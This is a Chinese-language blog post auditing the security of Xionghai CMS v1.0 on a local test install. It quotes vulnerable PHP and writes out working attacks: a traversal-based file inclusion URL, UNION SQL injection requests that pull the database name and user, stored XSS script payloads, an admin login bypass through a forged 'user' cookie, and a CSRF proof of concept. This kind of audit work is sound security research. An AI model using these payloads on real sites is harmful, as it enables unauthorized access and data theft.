熊海CMS xhcms v1.0代码审计

有空的时候就进行小型CMS的代码审计，这次审计的对象是熊海CMS v1.0

本地环境安装好了之后，可以看到提示安装了锁文件

说明重装漏洞应该不会存在了，这时候丢进seay代码审计系统的代码也出结果了，挨个看看

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

　　第一个疑似文件包含漏洞，对GET方式传进的参数r进行了参数过滤，但是存在目录穿越，黑盒尝试了一下使用点 反斜杠截断，无果，存在漏洞，但是只能包含本地php文件

创建一个phppinfo.php文件

本来是包含files文件夹下的php文件，通过目录穿越我们尝试包含phpinfo.php

http://127.0.0.1/xhcms_v1.0/?r=../../phpinfo

　　

成功包含

第二个疑似文件包含漏洞也是同样的利用方式，代码都是类似的：

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

　　再看一下疑似存在SQL注入的地方

$save=$_POST['save'];
$ad1=addslashes($_POST['ad1']);
$ad2=addslashes($_POST['ad2']);
$ad3=addslashes($_POST['ad3']);
if ($save==1){
$query = "UPDATE adword SET
ad1='$ad1',
ad2='$ad2',
ad3='$ad3',
date=now()";

　　这里可以看到对于POST方式输入的参数使用了addslashes函数进行过滤，所以这里的注入是一个误报，看下一处疑似注入：

在editcolumn.php文件中，存在如下代码：

$id=$_GET['id'];
$type=$_GET['type'];

if ($type==1){
$query = "SELECT * FROM nav WHERE id='$id'";

　　可以看到对于GET方式输入的id没有进行过滤，应该是开发者的遗漏，我们到本地网站上进行测试

http://127.0.0.1/xhcms_v1.0/admin/?r=editcolumn&type=1&id=1

　　输入单引号之后页面报错

http://127.0.0.1/xhcms_v1.0/admin/?r=editcolumn&type=1&id=1%27

　　

我们知道后端的php代码，就直接使用union select 进行注入

http://127.0.0.1/xhcms_v1.0/admin/?r=editcolumn&type=1&id=1%27%20order%20by%2010--+

　　

http://127.0.0.1/xhcms_v1.0/admin/?r=editcolumn&type=1&id=1%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10--+

　　字段数为10，回显位置有2,6,3,4,8

http://127.0.0.1/xhcms_v1.0/admin/?r=editcolumn&type=1&id=1%27%20and%201=2%20union%20select%201,database(),3,4,5,user(),7,8,9,10--+

　　使用payload查询database()和user()

成功获取到了数据。

测试了一下后台的头像文件上传，上传正常的图片好像都不行

一直都是这个头像，尝试寻找XSS，CSRF和越权漏洞

if (isset($_GET["callback"])) {
    if (preg_match("/^[\w_]+$/", $_GET["callback"])) {
        echo htmlspecialchars($_GET["callback"]) . '(' . $result . ')';
    } else {
        echo json_encode(array(
            'state'=> 'callback参数不合法'
        ));
    }
} else {
    echo $result;
}

　　这里使用了htmlspecialchars函数进行过滤，$callback参数不存在XSS漏洞，而result变量在前面是固定的几个选项，不能构造XSS

到联系的留言列表里面去，可以看到用户可以在这里留言，应该是我搭建的问题，导致用户不能提交留言，但是有一个管理员回复，我们到后台界面留言回复，进行XSS攻击。

使用payload：

<script>alert(1)</script>

　　

<script>alert(/xss/);</script>

　　再到网站联系界面，可以看到成功弹窗

同时我们审查元素，可以看到XSS的payload在页面的元素中，对管理员回复留言并没有进行限制，导致XSS漏洞的产生

关于越权漏洞，因为只有admin一个用户，我们尝试可不可以不输入密码进入后台

在后台主页进行抓包：

可以看到Cookie里面有user=admin，很容易联想到会不会是user所对应的名字就是它对应的权限，测试之后发现不是，因为就一个用户，但是测试发现只要存在user，就能够进入后台，如我们先将cookie删除：

可以看到会将我们重定向至login界面

将cookie中的user改为一个并不存在的用户SpringBird，可以看到后台登录成功。

寻找CSRF漏洞，CSRF全程为跨站请求伪造，即可以劫持其他用户去进行一些请求。我们尝试劫持管理员的权限去删除文章

点击删除文章之后抓包

使用burpsuite自带的CSRF POC生成

在本地创建CSRF.html，访问之

可以看到出现了按钮，抓包的时候我们可以看到没有token验证，证明很有可能存在CSRF漏洞，这个时候浏览器还保存着管理员的身份信息，所以点击Submit就能够删除对应的文章

成功进行CSRF攻击。

继续努力吧。

参考链接：

http://foreversong.cn/archives/387